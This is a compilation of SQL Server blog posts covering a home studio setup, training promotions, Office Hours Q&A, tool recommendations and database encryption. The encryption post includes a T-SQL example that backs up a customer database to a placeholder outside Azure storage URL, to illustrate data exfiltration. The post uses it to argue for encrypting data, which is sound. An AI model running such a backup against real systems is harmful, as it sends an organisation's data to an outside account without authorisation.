
Vegas Home Office Tour

Home Office

I’ve been teaching online from home for years, and you’d probably think my office would keep growing and growing – but actually, my setup has gotten a lot smaller since the last time I blogged about it. I don’t really need space in order to work, and I kinda wanna incentivize myself to get out of the office when my work is done.

I designed my Vegas home office around the side camera view that the audience sees while we’re doing live Q&A and chatting in Slack (the window at the top right of the stream):

I wanted a lively view with a bunch of personal stuff in the background (although blurred a little with good bokeh.) Here’s how it looks behind the scenes – the entire wall to the left is painted chroma key green so I can do greenscreen work:

And here’s the camera I’m staring at when the side view is on:

When I turn back to the computer to continue presenting, here’s what the setup looks like:

Desk: Vari Standing Desk – I went for the smallest stable standing desk I could find. It’s got just enough room for my monitor, laptop, keyboard, trackpad, and Stream Deck, but no more than that. It’s quite the departure from my giant NextDesk Terra Pro, which is down in the garage now.

Chair: Vari Active Seat – I’ve used an Aeron on wheels for years, but I wanted something that was more of a bar stool height. I was really curious about the Active Seat because it doesn’t have wheels, and instead lets you naturally move around in a small area. I thought for sure I’d fall over – but it’s been great! I love it, and I can sit on it for hours.

Laptop: MacBook Pro 16 – I’m on the 2021 model with the M1 Max processor and 64GB RAM. The Apple Silicon processor is everything you’ve read about in reviews: crazy fast and completely silent, even when I’m streaming and recording videos. The ARM processor can’t run SQL Server in Windows VMs, so I use the cloud for that instead.

Monitor: Gigabyte M34WQ 34″ (RTings) – Around $500 for 3440×1440 resolution and a 144Hz refresh rate. I like the way Apple’s Pro Display XDR looks, but I’m not about to spend 10X more in order to see colors more vividly when I’m partially colorblind anyway.

Control panels: Elgato Stream Deck XL – A vital, vital part of my streaming workflow with keys to trigger all kinds of stuff that I use while streaming. I use two of these, one on the right side of my desk and one on the left, because regardless of what I’m doing and where I’m standing, I wanna be able to trigger events.

Elgato Stream Deck

Slack chat display: Apple iPad – In my classes, the audience can ask questions and chat with each other via Slack. I need to be able to see that chat at all times so I can respond immediately to questions or feedback. When I’m doing PowerPoint presentations full screen, I need one clean monitor with the PowerPoint display that the audience will see, and the other display is PowerPoint presenter view. I could have added another monitor to my desktop, but I just didn’t wanna take up much space, and an iPad is perfect for this.

Green screen camera: Sony ZV1 – This is actually a big step down from my previous streaming setups. When I’m doing green screen work, my image is a small part of the entire screen, so I don’t need a really good camera here. I just need something better than the typical USB webcam, because those don’t pick up enough color details for green screen work. The ZV1’s small sensor is good enough. I use the HDMI output, and plug that into an Elgato Cam Link 4K. I have a Rode VideoMic Go on the top of this camera as an emergency microphone in case my wireless headset goes out during a class. The mic is always on, so if my regular mic dies, I can just unmute the ZV1’s audio in OBS, and we can keep right on going.

Side camera: Sony ZV-E10 with Sigma 16mm lens: While I don’t need a high quality green screen camera, the side view camera has to be lusciously detailed. When I switch to the side camera, I’m having a discussion with the audience, and I take up the whole screen. I want the background to be defocused. This camera’s HDMI output also gets plugged into an Elgato Cam Link 4K. If you need to plug multiple Cam Links into a laptop, I don’t recommend routing them through a dock – instead, get a simple USB 3.1 hub. Otherwise, when I run too much through a dock, the Cam Links end up dropping offline.

Microphone: DPA headset microphone plugged into a Sennheiser AVX transmitter, into a Focusrite Scarlett – This setup is total overkill, but I really like the flexibility of being able to move around a lot while I do green screen work, and not have to worry about tripping over cables.

Lighting: a hodgepodge. A pair of Neewer 12.9″ lights for the desk, and a couple of older Neewer lights to light the green screen. I really wanted to use Elgato Key Lights so that I could automatically turn them off & on when I changed camera scenes and put the stream on break. However, the Key Lights' WiFi connections were wildly unreliable for me. The Neewer lights are actually mounted to Elgato Key Light stands because those are nice hardware, but the Key Lights themselves are sitting in the closet, unused.

Streaming software: OBS. I’ve written about how I use OBS for streaming and training classes, and how to make online streams fun and interactive with OBS scenes. For video delivery, I use Mux for private classes, Twitch for public streams, and YouTube for public stream replays.

If you’ve got questions about my office setup, feel free to ask away in the comments!

Free Live Webcast: Why is One Query Sometimes Slow and Sometimes Fast?

SQL Server

Sometimes the exact same query goes slow out of nowhere. Your current fix is to update statistics, rebuild indexes, or restart the SQL Server. It works, but you don’t know why.

The single most common reason is parameter sniffing. SQL Server “sniffs” the first set of parameters for a query, builds an execution plan for it, and then reuses that same plan no matter what parameter values come in later. It’s been the bane of our performance tuning for decades.
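Here’s a minimal sketch of how it bites, using a hypothetical Users table with a nonclustered index on Reputation – the names here are illustrative, not the webcast demo:

```sql
CREATE OR ALTER PROCEDURE dbo.usp_UsersByReputation
    @Reputation INT
AS
BEGIN
    SELECT Id, DisplayName
    FROM dbo.Users
    WHERE Reputation = @Reputation;
END
GO

/* First call: @Reputation = 2 matches only a few rows, so SQL Server
   builds (and caches) a plan with an index seek plus key lookups. */
EXEC dbo.usp_UsersByReputation @Reputation = 2;

/* Second call: @Reputation = 1 matches millions of rows, but the cached
   seek-plus-lookup plan gets reused anyway - and runs painfully slow. */
EXEC dbo.usp_UsersByReputation @Reputation = 1;

/* One emergency workaround: force a fresh plan on the next execution. */
EXEC sp_recompile N'dbo.usp_UsersByReputation';
```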

In this one-hour session on Thursday, October 20th, I will explain:

  • How it happens
  • How SQL Server 2022 is trying to fix it
  • How you can work around emergencies in the meantime

Thanks to the session’s sponsor, Pure Storage, the first 200 folks to register and attend the entire webinar will get a $10 gift card for lunch. Get your lunch and learn on for free.

Buckle Up: October is Free Fundamentals Month!

Company News

Recorded Class Season Pass

How about some completely free SQL Server training?

Every weekday during the month of October, one of the modules from my Fundamentals classes will be absolutely free to watch. But you gotta watch it that day – you snooze, you lose.

To prep, block out a 30-minute window on your calendar, right now. Put a label on it, and bookmark this page. Each day, come back to this page, click on the day’s module, and get your learn on. Here’s what you’ll learn:

Fundamentals of Index Tuning

To follow along with the labs this week & next week, you’ll need SQL Server 2017 or newer, with the most recent Cumulative Update, the most recent SQL Server Management Studio, and the 50GB Stack Overflow 2013 database (10GB 7z file, extracts with 7-zip.) You don’t have to follow along with the labs, but I highly encourage it.

Fundamentals of Query Tuning

Fundamentals of Columnstore

For this class, you don’t have hands-on labs, and you’re not meant to follow along with the demos. Columnstore is about bigger data, so I use the 2018-06 ~180GB copy of Stack Overflow (info page.) You definitely don’t need to grab that, but I’m mentioning it here in case you want to follow along with the demos.

Fundamentals of TempDB

For this class, you don’t have hands-on labs, but if you want to follow along with the demos, I’ll be using the same 50GB Stack Overflow 2013 database we used during the first two weeks.

Eagle-eyed readers will note that this isn’t all of the modules from each class, nor is it all of my Fundamentals classes. That’s because this whole thing is a diabolical mind trick, dear reader. I aim to get you hooked on the quality of my online training, and then come November 1st, when my annual Black Friday sale starts, you’ll be ready to get out your wallet – or your boss’s wallet – to get a Recorded Class Season Pass: Fundamentals, or Mastering, or the Level 2 Bundle when they go on sale.

These are recordings of live classes. In the live class, the questions & chat take place over Slack. You don’t need to join the Slack – I only monitor that chat room during the live classes. (I’m on vacation in New York at the moment, heh.)

Now go block out a recurring 30-minute window in your calendar every weekday in October. See you in class!

[Video] Office Hours: Six-Minute Speed Round


The morning after the Data TLV Summit in Tel Aviv, I stood out on the balcony and answered a few of your questions, rapid-fire style:


Here’s what we covered:

  • 00:00 Intros
  • 00:47 cyrpl: Hi Brent from PEI, Canada. A support person told me today that when creating a table, an ID column should almost be a default for every table. Do you agree? 98% of our tables do not have ID fields. Would adding ID fields to busy tables generally help query performance?
  • 01:15 Nas: What is quickest and short downtime way of migrating 7TB database on new storage old SAN (DELL) new SAN(HPE)?
  • 02:19 Simon Frazer: Have you come across scenarios where you feel SQL Server would’ve benefited from allowing more than 1 8k page for statistics?
  • 02:38 Ingibjorg: Do Postgres DBAs tend to have higher pay ceilings than MSQL DBAs?
  • 03:12 Ingibjorg: What tools / tests do you like to use when performance testing the network layer for a new SQL server?
  • 03:32 sp_blitz_says_myboss_is_a_rocket_scientist: in what cases should we create statistics ourselves?
  • 04:33 Does Basically Anything: Hi Brent! How would you recommend tuning when faced with a cursor query that has so many iterations that you can’t pull an actual execution plan when running it because it overwhelms SSMS?
  • 05:06 Ingibjorg: Management uses KPI’s to judge the developers. Management also wants KPI’s to evaluate the SQL production DBA. In addition to meeting RPO/RTO objectives, what are good / bad KPI’s for this? Tickets closed, peer review scores, etc?
  • 05:47 Mehmet: At what point should you ask dev to introduce app layer caching for a query that is rapidly re-executed?

[Video] Office Hours in Tel Aviv, Israel


Before speaking at the Data TLV Summit, I sat by the Mediterranean Sea and discussed the top-voted questions you posted.

Here’s what we covered:

  • 00:00 Start
  • 00:55 Manikandan GS: As postgres being one among the RDBMS lane, do you think postgres is having more features and flexibility compared to MS-SQL Server?
  • 02:46 PaginationWoo!: Hi Brent. I use Ola’s script to update stats nightly. Other than time spent and % CPU used, is there a case where updating stats with fullscan would be a bad thing? I’m fortunate in that I have a long maintenance window. If I have time for fullscans, wouldn’t it be worth doing?
  • 04:42 Adza: I had the thought of creating a date table with all dates ranging from 2010 to 2070 and have a smallint key for each date. Then in my tables I can store smallint values instead of actual dates. This could be a huge data saver (2 bytes vs 3 bytes). Smart or stupid?
  • 05:53 Eyes Without a Face: Is there a portable version of the First Responder Kit? Our customers are mainly banks and they are not keen to install Stored Procedure. Not even the First Responder Kit
  • 06:44 Dawson from Dawsons Creek: Do you have any clue why Microsoft suggests to use a windows collation for new development work but the default server collation for English(US) is still a SQL collation? For all other Windows locale the default server collation is a windows collation.
  • 08:07 StillLearning: Hello Brent, as a Dev DBA I’ve recently became increasingly frustrated with computed columns and their limitations (filtered index…). Should I advise the dev teams to refrain from using them and do the computation in the app instead ? Thanks
  • 09:26 Haurun: What are the pros/cons of installing Ola Hallengren maintenance script tables / sp’s in master database vs some kind of maintenance db?
  • 10:42 Milind: Hi Brent, Thanks for your time. During execution of certain queries or SPs I am observing high logical reads. Where should I look to make sure it is appropriate or required improvement? Unfortunately, I haven’t completed all the training modules and asking this question.
  • 12:06 TheCuriousOne: Hi Brent! If you have to work with local SSDs in a server for your SQL setup, is it better to have one big array with OS side logical separation through partitioning or to have physical separation by setting up smaller disk-sets with various RAID configurations?

New Online Class: Running SQL Server in AWS and Azure

Cloud Computing

You’re used to managing your own SQL Servers in VMs, but now they’re asking you to work with the cloud.

You’re already comfortable installing, backing up, and performance tuning “regular” SQL Servers, and you just need to catch up with what’s different about the cloud.

You don’t want hype – you just want honest opinions from someone who doesn’t work for a cloud vendor.

In this recorded class, you’ll learn:

  • How to assess your current workloads
  • How to pick the right VM type for your workload
  • How to size storage for performance, not size
  • How to assess wait stats in cloud VMs
  • How to back up directly to cloud-native file systems
  • Where Azure Managed Instances & AWS RDS make sense

I’m Brent Ozar, and I’ve been managing client VMs in the cloud for over a decade. I’ll get you up to speed with unbiased facts, not hype, and save you valuable time as your career transitions to the next level.

To get started saving your company time and money, get the course for $195. Folks with a Recorded Class Season Pass: Fundamentals or a Level 2 Bundle can start watching the class right now under their account. Enjoy!

Office Hours: Gif Reactions Edition

Some of the questions y’all post are open-and-shut cases. I was going to do a one-word-answers edition, but I think this is even better: gifs.

GI Joe DBA: Thoughts about IT professionals Unionizing? IT professionals are in demand. Because of our demand, should we use this leverage to unionize, raise the bar, force better health benefits, retirement benefits, etc for ALL.. US Citizens? Ever discuss this with colleagues?

Rudy: Love the statistics parser web site. Will it remain around for the foreseeable feature? If not, is the source code freely available? 

Will Marshall: What are the common mistakes to avoid when coding sprocs that will crash SSMS during execution / debugging?

DBA_Mufasa: Salut Brent! Does using filegroups really help distribute I/O throughput and minimize disk contention if the ndf files for those filegroups still reside on the same logical volume?

Justsin: Do you ever like to use “SET STATISTICS XML ON” for troubleshooting stored procedures?

40 oz Coffee Breakfast: Do you have any experience with using DDBoost as a backup solution? My friend is currently using Ola’s scripts to backup to a Data Domain as a CIFs share. Storage team asks for us to use DDBoost but there is a concern about losing granularity of restores.

Dan: Any insight into why DB restores are unbelievably painful within Azure SQL, we seem to be averaging between 20-80 minutes with < 50% success on a less than 200mb db and results are still mixed regardless of if we do point in time or full restores.

Sql Padawan: Hi Brent! I’ve really enjoyed your Mastering courses. Especially the stories and analogies you use (like the one about pets wearing disguises). What do you recommend to create a successful online course? (btw, I’m not planning to create SQL Server courses 😀 )

Menahem: Does high plan cache turn over due to improper query parameterization adversely affect commercial SQL monitoring software?

Bart: Hi Brent. What’s the best way to convert UTC datatime to local datetime/date. I’ve been using this: CONVERT(DATETIME, SWITCHOFFSET(CONVERT(DATETIMEOFFSET, mydate.MODIFIEDDATETIME), DATENAME(TZOFFSET, SYSDATETIMEOFFSET()))) AS LOCALDATETIME

Will Marshall: What are the pros/cons of letting SQL create the temp table via SELECT INTO (i.e. SELECT into #MyTempTable) vs explicitly creating the temp table then inserting into it?

YouGottaDoWhatYouGottaDo: Hi Brent, do you know of a list of former “Best Practices” for SQL Server that have now become useless or even dangerous/harmful (due to engine/OS evolution)?

Menahem: Do any of your clients run their primary AG / HA SQL2019 node on prem and their secondary 2019 AG / HA node in Azure? Is this a bad idea?

And I’ll leave you with a bonus gif:

Most DBAs Say They’re Encrypting Personally Identifiable Data. Most.

Despite the continuous stream of data breaches, ransomware, and GDPR violations, some companies still aren’t encrypting personally identifiable information (PII) inside their databases or backups.

I see this all the time when working with clients, but I can’t exactly talk about that or give numbers, so I decided to take a highly unscientific poll on Twitter. I figure if DBAs are sitting around on social media, they’re probably done with all the important parts of their job. The 147 votes came in:

Hoping for more upbeat news, I also asked on LinkedIn, a more professional social media network, where maybe people do their jobs better? I’m just guessing, who knows:

The story was better, but it’s still sketchy. Depending on where you ask, one in five to one in three shops isn’t encrypting their personally identifiable information at all.

I actually have a hunch the number is much worse because in a social media poll, we’re just taking folks at their word. In reality, when I’ve lifted the covers to dig a little deeper with the business, we’ve found things like production data being restored to development servers, and stored unencrypted.

When I’ve discussed this with clients, some folks even say, “Yes, we’re encrypting data – we use encryption at rest at the storage level. Everything that hits disk is encrypted automatically.” Okay, great – now what happens when someone takes a backup? They can copy that backup anywhere they please, like writing directly to someone else’s Azure Blob Storage account or to Amazon S3, and you won’t get any errors or warnings. Storage-level encryption doesn’t stop data exfiltration.
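To make that concrete, here’s a sketch of the exfiltration path – the storage account URL and database name are placeholders, and the point is that storage-level encryption never sees the backup stream:

```sql
/* With only at-rest encryption on the storage layer, nothing stops a
   backup from being written to *any* Azure Storage account - not
   necessarily one your company owns. */
CREATE CREDENTIAL [https://somestorageaccount.blob.core.windows.net/backups]
    WITH IDENTITY = 'SHARED ACCESS SIGNATURE',
    SECRET = '<SAS token>';

BACKUP DATABASE CustomerData
    TO URL = 'https://somestorageaccount.blob.core.windows.net/backups/CustomerData.bak';

/* The backup file itself is unencrypted unless you explicitly use
   backup encryption, e.g.:
   WITH ENCRYPTION (ALGORITHM = AES_256, SERVER CERTIFICATE = BackupCert) */
```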

It’s okay if you don’t have all of the answers, but as a database administrator, you should start by asking a few questions:

  • Where are we storing personally identifiable information?
  • Is that data encrypted, and how?
  • If it’s not encrypted, what’s the plan to get it encrypted? Is the business waiting on me to do something?
  • Has anyone given my manager and the company’s security & compliance departments those above answers in writing?

Asking those questions is the first step to getting your company to a safer place.

[Video] Office Hours: Ask Me Anything About SQL Server and Azure


Got questions about the Microsoft data platform? Post ’em and upvote the ones you’d like to see me cover. Today’s episode finds me in my home office in Vegas:

  • 00:00 Intros
  • 02:10 GeorgeDAX: Hello Brent, I’m a dealing with a huge sales table which contains around 500 columns with 50m rows. Business asks to add even more columns in the table. Should I break the table or keep adding columns to the same one? Performance wise, what’s the best approach?
  • 04:47 Brynjar: Do you have a suggested max column limit when designing new tables that require fast queries?
  • 05:58 Manuel Labour: What is the largest stored proc you ever had to optimize? How long did you spend on it?
  • 07:24 Yavin: When analyzing SQL memory use, what are healthy / unhealthy utilization ratios for MEMORYCLERK_SQLBUFFERPOOL, CACHESTORE_SQLCP, MEMORYCLERK_SQLGENERAL?
  • 08:21 Eduardo: Is it safe to run sp_blitzindex on a busy OLTP server (3000+ batches per second) during peak business hours or should this be done after hours?
  • 10:22 3rdNormalForm: HEAPS & Vendor Packages. I have a 43 million row table called transactionxlog with no keys and no CX. sp_blitzcache shows 7 queries against this table with costs of 883. I took the recommend composite index and made it into a clustered index. [UNIQUIFIER] what is it?
  • 12:05 DB_Architect_Chick: Hi Brent. I’m designing a new database for 50k inserts/selects (minimal updates) per hour. I am doing my best to make mature design decisions, but with no actual data to test against, do you have any suggestions for establishing an effective initial index strategy?
  • 15:22 Eduardo: What is your opinion of Intel QAT backup compression in SQL 2022?
  • 17:34 Vilhelms: Is there a good way to know when a query caused an auto stats update and how long the auto stats update took?
  • 19:39 Pete S: What is your opinion\thoughts on the “SQL Graph Database” feature that was introduced in SQL Server 2017? Have you worked with any clients that use it in production OR is this another “copy-cat” feature to keep up with the database Jones’?
  • 20:57 RaduDBA: Mr. Brent, with all the cloud solutions and cloud databases that take over the data landscape, like datawarehouses, lakehouses etc. is there still room for SQL Server and traditional on-prem databases? I work as a DBA and do a lot of performance tuning. Is my career doomed?
  • 23:43 cyrpl: Brent, can you suggest a stored procedure source control tool. We have gitlab for code source control but we specifically want to track all changes to SQL Server stored procedures.
  • 25:56 YouGottaDoWhatYouGottaDo: Hi Brent! Have you ever encountered a very toxic work environment (dictator-boss, widespread discontent etc.) that created problems for you during your consulting work (even 1-day consultancy)? How did you handle this?

Community Tools Month: Using sp_WhoIsActive to Catch ASYNC_NETWORK_IO


When your SQL Server’s top wait stat is ASYNC_NETWORK_IO, that indicates SQL Server is waiting on the app to ask for the next part of the result set.

This is a real pain in the rear to troubleshoot because these waits often only last a really short duration each time – think milliseconds, not seconds. It’s a death-by-a-thousand-cuts issue.

The easiest way to get a quick idea what’s happening is to use sp_WhoIsActive (Github – releases) repeatedly with no pauses in between:

Here, I’m running a workload with a lot of short queries executing simultaneously. If I only run sp_WhoIsActive every now and then, I don’t see much activity – just a query or two, and they’re rarely waiting on network. However, if I run it several times in a row, right away:

Then I can get a fast, seat-of-the-pants idea of which queries are waiting on networking. I can also scroll across to the right in the result set and see which app it’s coming from, which servers, which logins, etc.
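One quick way to do that back-to-back sampling in SSMS is the GO-with-a-count trick – each execution returns one snapshot, and you scan the wait_info column across the snapshots:

```sql
/* Highlight both lines and execute as one batch in SSMS.
   "GO 10" repeats the batch 10 times with no pause in between,
   giving you 10 rapid-fire snapshots of current activity. */
EXEC sp_WhoIsActive;
GO 10
```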

This isn’t an exact science by any means, but when I’m working with a client, it helps me quickly get a rough idea of what’s going on. It helps me start a conversation about the kinds of queries we’re running, how much data we’re bringing back (both in terms of rows and columns), and find out whether the app servers might be underpowered or swapping to disk.

Clients have said things like:

  • “Oh, we had no idea that app was bringing back all of the columns, and that’s problematic since we added a few XML/JSON/MAX columns in the table since that query was written.”
  • “Oh, we had no idea that application was taking so long to digest the results of those queries. We can give that app server more memory.”
  • “Oh, we had no idea that it was bad if we ran the database server in one data center, and the app servers elsewhere.”

ASYNC_NETWORK_IO isn’t necessarily a bottleneck for SQL Server – fixing the above problems may not make a big performance difference overall for other users – so solving it is often relatively low-value work during the engagement. sp_WhoIsActive helps me dedicate the appropriately small amount of time & effort to the problem, and then move on to the bigger problems.

[Video] Office Hours: Hotel Balcony Edition, Part 2


Post your questions and upvote the ones you’d like to see me cover. In today’s episode, I sit down on a quiet hotel balcony and talk through a bunch of interesting questions:

Here’s what we covered:

  • 00:00 Introductions
  • 00:59 Haydar: What tools do you like to use when troubleshooting azure sql db query performance issues?
  • 01:57 The Midhight Idol: Does the glitz and glamour of Vegas ever wear off or get old?
  • 02:48 Haydar: Would a PostgreSQL version of constant care see the same demand and success?
  • 03:23 Walcott: Which Intelligent Query Processing features do you like or dislike in SQL Server 2019 and 2022?
  • 04:18 Delete_Rule:Cascade: Good day Brent! I’m new to data warehousing and I was wondering what your thoughts are on using SSIS for ETL operations? Are there similar products out there that are better or is SSIS the go-to product?
  • 05:08 Nikolajs: What is the largest number of tenants you have seen inside a single multi-tenant SQL server instance? Did this pose any unique challenges?
  • 07:00 Morty: What are your thoughts on new SQL 2022 ledger functionality and its use cases?
  • 09:27 MyFriendtheDBA: I’m getting excited about PASS Summit this November (my first). Being a Seattle-neophyte, any restaurant/food truck/personal kitchen recommendations for the trip?
  • 11:42 Nomad: My friend copied a database with Windows authentication using the “detach and attach” method. The .mdf and .ldf file permissions changed and reattaching the database failed. Why did the file permissions change and what steps would you take to resolve this issue?
  • 12:36 Madiha: What’s your opinion of the query plan viewer in Azure Data Studio?
  • 14:13 CronullaStingray: Hi Brent. I ran blitzindex and got “Indexaphobia: High Value Missing Index” which I created without modifications. It’s been over a month and the dm_db_index_physical_stats user_seeks and user_scans are both showing 0s. But blitzindex still says I need to create it. Why is that?
  • 15:33 Anatoli: How do you know if query store is a good / bad fit for your SQL server 2019 enterprise instance?
  • 16:30 Anatoli: What are the risks of long running native SQL backups?

[Video] Office Hours: Hotel Balcony Edition, Part 1


Post your questions and upvote the ones you’d like to see me cover. In today’s episode, I sit down on a quiet hotel balcony and talk through a bunch of interesting questions:

Here’s what we covered today:

  • 00:00 Introductions
  • 00:25 Kebros: Hi Brent.My manager wants me to summarize sql health into a number 1-100 for all 50 production Servers.This is idiotic but just for Banter, what health metric (Eg I/O) will you advise me to use and average out (even if it doesn’t paint a whole picture) so I can feed my family.
  • 02:08 SwissDBA: Hi Brent, I inherited a database of 2 TB with 355 data files. How would you check (and prove to the business) if the database has too many data files? Even the biggest file is just 55 GB big and I believe the DB could be faster with much less data files.
  • 04:32 Britney: What are the common strategies you see used for recovering from “Oops” queries?
  • 05:40 LifeExtinguisher: Can rcsi improve backup speed? Considering backup reads the whole db and saves in bak file, and reads are routed to tempdb for older values, not needing shared lock on resource that already is booked by some other exclusive lock
  • 06:33 Sussudio: What tools / techniques do you recommend for generating large pseudo-realistic synthetic data loads for performance testing in the lower SQL environments?
  • 08:27 Dilara: When are SQL Server questions better suited for vs Which forum has less snark?
  • 09:25 Lieutenant Dan: What are the top 4 SQL conferences ranked in order?
  • 11:33 Fyodor: What is your opinion / experience with using client side profilers like C# MiniProfiler to monitor SQL query performance?
  • 13:14 Does Basically Anything: Hi Brent! Regarding sp_databaserestore. I was wondering if you knew of anyone who wrote something open source that utilizes it for automating testing restores from multiple servers, multiple databases. Any clickholes I could venture down before I start building something myself?
  • 14:28 happydba: do you have a video of the baby sea turtles yet?!? 😀
  • 15:14 Haydar: What are your preferred scripts / tools for monitoring Always On latency?

Community Tools Month: Choose Your Character

This month on the blog is Community Tools Month, and I’m going to be talking about some of the most useful and influential tools out there.

You can’t learn them all – *I* can’t learn them all – because there just aren’t enough hours in the day to do your work, keep your skills sharp, take care of yourself, and take care of the ones you love.

So this month, think about a couple of things:

  • Can I use this tool to get my existing tasks done faster?
  • Do I want to keep doing these tasks in my next job?
  • What tasks do I wanna do in my next job?
  • Can I learn this tool to help me get my next job?

With that in mind, here’s something I use all the time with clients when I’m asking how many staff they have to support a particular application:

There are certainly more data-related jobs – BI developer, architect, data scientist, data engineer, etc – but let’s start here.

I know there are gonna be readers who say, “I do all of those tasks.” Sure you do – but you don’t do them well, and if you think you do, you’re deceiving yourself about what “well” means for any of those columns. You’ll be in for a world of surprise when you go to interview for a senior position in any of those columns, because senior = specialist.

With that in mind, for each of those columns, today I’m going to list a tool that I think is important for your next job.

If you want your next job to be Production DBA,
you should be learning dbatools.

In your current position, you may not manage enough servers to justify it. You might be content doing your work one server at a time, with the SSMS GUI and T-SQL. However, the Production DBA role at small companies will continue to evolve over the next decade, and your skills need to be ready for your next job. You want bigger responsibilities, and that means accomplishing more tasks, more quickly.

Get these two books and read them in order:

You’ll learn how the open source dbatools module helps you manage more servers, in less time, while making fewer errors.

Like any new tool, it’s going to be slower going for you at first – probably even for months. But when it’s time to get your next job, the one managing more servers in more environments, you’re going to be able to use the exact same techniques that you’ve already been practicing at your smaller job.

If you want your next job to be a Development DBA,
you should be learning sp_HumanEvents.

I’m not telling you to learn Extended Events – you can, sure, but you don’t need to. Erik Darling’s sp_HumanEvents automates the data collection AND, here’s the important part, the analysis, for the most common long-term problems that performance tuners need to solve. I don’t use Extended Events myself directly, ever, but I use sp_HumanEvents all the time.

To understand how powerful and useful it is, start with Erik’s 10-minute video on using it to troubleshoot blocking, compiles, and recompiles.

Then, go get it and read the documentation.
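To give you a feel for it, here’s the shape of a couple of typical calls – parameter names are taken from the sp_HumanEvents documentation at the time of writing, so double-check the current docs before relying on them:

```sql
/* Watch for blocking for 30 seconds, then get back an analyzed summary
   instead of raw Extended Events XML. */
EXEC dbo.sp_HumanEvents
    @event_type = N'blocking',
    @seconds_sample = 30;

/* Or: catch queries running longer than 5 seconds over a 60-second window. */
EXEC dbo.sp_HumanEvents
    @event_type = N'query',
    @query_duration_ms = 5000,
    @seconds_sample = 60;
```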

If you want your next job to be developer,
you should be learning MiniProfiler.

When your team builds software-as-a-service (SaaS) applications, sooner or later, you’re going to run into a problem with server performance analysis. SQL Server has historically struggled with this, and it’s getting even worse in SQL Server 2022.

Because of these problems, you’re going to be a much more effective developer if you can implement the free open source MiniProfiler to track which parts of your application are having performance problems, and which queries are causing those problems.

I’m not saying you have to be the one who analyzes the data, reads the queries, and tunes them. However, as a developer, you are the one who’s going to have to implement the data-collecting solution. This need is even more important in the cloud where performance costs pile up every month, and the urgency to fix ’em becomes even higher.

All 3 of these have something in common.

They’re on GitHub.

GitHub itself isn’t a community tool, but in 2022, GitHub is the tool where community open source happens. I’m not saying you have to learn GitHub or use it for your own code – it can be a real pain in the keister. But if you learn the basics of how to clone a project locally and keep it up to date, you’ll likely be better off no matter what your future job entails.
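If you’ve never touched git, “the basics” really do boil down to two commands. Here’s a sketch using the First Responder Kit repo as the example project:

```shell
# Clone the project once -- this downloads the whole repo into a local folder
git clone https://github.com/BrentOzarULTD/SQL-Server-First-Responder-Kit.git
cd SQL-Server-First-Responder-Kit

# Later, whenever you want the latest version, pull the updates down
git pull
```

That’s genuinely all you need in order to stay current with a community project – branching, forking, and pull requests can wait until you actually want to contribute.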

Office Hours, Short Text Answers Edition

Not all of the questions y’all post require long, thought-out answers. Some are just one-line specials, like these:

F’legend: Hi Brent, in reply to a question talking about database restores for 1TB+ you also touched on scrubbing or synthetic data as a way to populate dev environments. Are there any resources/tools you would suggest for these approaches?

Read this and the comments on it.

On Another Beach Somewhere: I am using multiple instances of SQL on the same VM. Brent says that’s a bad idea… let’s pretend I have a good reason. How does Min/Max Memory come into play? Can I set both instances to the same “Max” and let them compete for memory, or do I need to allocate a portion to each?

Congratulations. You just discovered one of many reasons why I told you it was a bad idea. Just wait til you discover CPU contention.

Steph: Hello Brent, is there a reason why SQL Server doesn’t seem to have shortcuts to compute stats on columns with a unique constraint? Why scan all rows when the density is always 1/count(*) and histograms seem useless? This confuses me. Thanks.

Because some queries will do range scans, as in, show me all IDs between 1000 and 2000. SQL Server needs to know how many IDs exist in that range – some IDs may have been deleted. The only way to find out is to read the data.
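Here’s the shape of query that forces the histogram read – the Users table is from the Stack Overflow demo database used elsewhere on this blog:

```sql
/* Id is unique, but how many Ids survive in this range after deletes?
   Only the statistics histogram can estimate that. */
SELECT COUNT(*)
FROM dbo.Users
WHERE Id BETWEEN 1000 AND 2000;
```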

Darin Webber: Hello Brent!! I need to change the datatype of 2 columns on a very large table. What would be the best approach for this operation? Creating 2 new columns, copying the data, and then dropping the old ones – or is there a better approach? Will dropping the columns cause downtime?

Read this.

Tayyip: Is there an ideal index usage stats age band for when it’s safe to make decisions re: dropping rarely used NC indexes?

For me, if an index hasn’t been used in 32 days, it needs to go.

Don’t Blame Anthony: What is your opinion of using Pure FlashBlade to speed up SQL backups and restores?

I haven’t used it myself.

Daniel: Can you please please break down steps and the process of consuming data from an API (JSON format) using SSIS and then uploading that consumed data into a SQL Server database? Thanks!

I don’t use SSIS.

Bad DBA Taylor: We built a devops repo to deploy SQL permissions for service accounts, but due to the high volume (15k batches/s), the release pipeline gets deadlocked: a very simple CREATE USER statement causes a massive SCH_M lock chain. Our security cache is 12GB. Could this be the problem?

If you think it is, try to flush that cache first as part of your deployment scripts. (I have a feeling it isn’t, though.)

RoJo: I want to add AG offsite. Can I use 2016 on-site and 2017 or 2019 offsite?

I would not do that, no. Failover would be one-way – you couldn’t fail back.

TeeJay: We recently had to do an unplanned over-the-top SQL upgrade from 2014 to 2017 in our prod environment (yes, bad, I know). I now have a bunch of fires to put out. Are there any obvious first places to look for new performance problems (like the cardinality estimator was for 2014)?

Indeed there are! Check out my Mastering Server Tuning class.


Tayyip: What are the pros/cons of working as the sole SQL DBA vs working on a team of SQL DBA’s?

You can learn more, more quickly, by working with others. You also have to put up with them.

Alex: Hi Brent, You look like someone that is in pretty good shape. How do you balance your Work, Health & Mind in what can be a sedentary job? Especially because of Covid, a lot of people are not having to go into the office any more.

Read this.

Seshat: What are your thoughts on using SQL startup option -E for index rebuild / read ahead performance across multiple data files?

Never heard of it.

Sekhmet: What is your experience / opinion of using NVDIMM / PMEM as a high speed storage for SQL Server?

It’s dying.

Don’t Blame Anthony: How do you deal with undetected write errors in SQL server?

Detect them by running DBCC CHECKDB as frequently as practical – even overnight if your business windows allow it.
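A minimal example – the database name is just a placeholder:

```sql
/* NO_INFOMSGS suppresses the informational chatter so real errors stand out. */
DBCC CHECKDB (N'YourDatabase') WITH NO_INFOMSGS;
```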

Anatoli: What interesting tools do you know of (besides SSMS / Sentry Plan Explorer) that will parse SQL query plans?

Quest Spotlight Tuning Pack is another one.

DBAInProgress: Hello Brent. What different screencast softwares have you used to overlay yourself onto your screen with audio?

Read this.

Piotr: What are your favorite DMV’s in Azure SQL DB?

I don’t have a separate set there – I try to use common ground between both Azure and SQL Server.

Fyodor: Do you have any guidelines for maximum number of columns to allow for the include columns in a NC index?

Yes, and we discuss them in my Mastering Index Tuning class.

Mahesh: When SQL is migrated to the cloud, will there be a change to RTO and RPO?


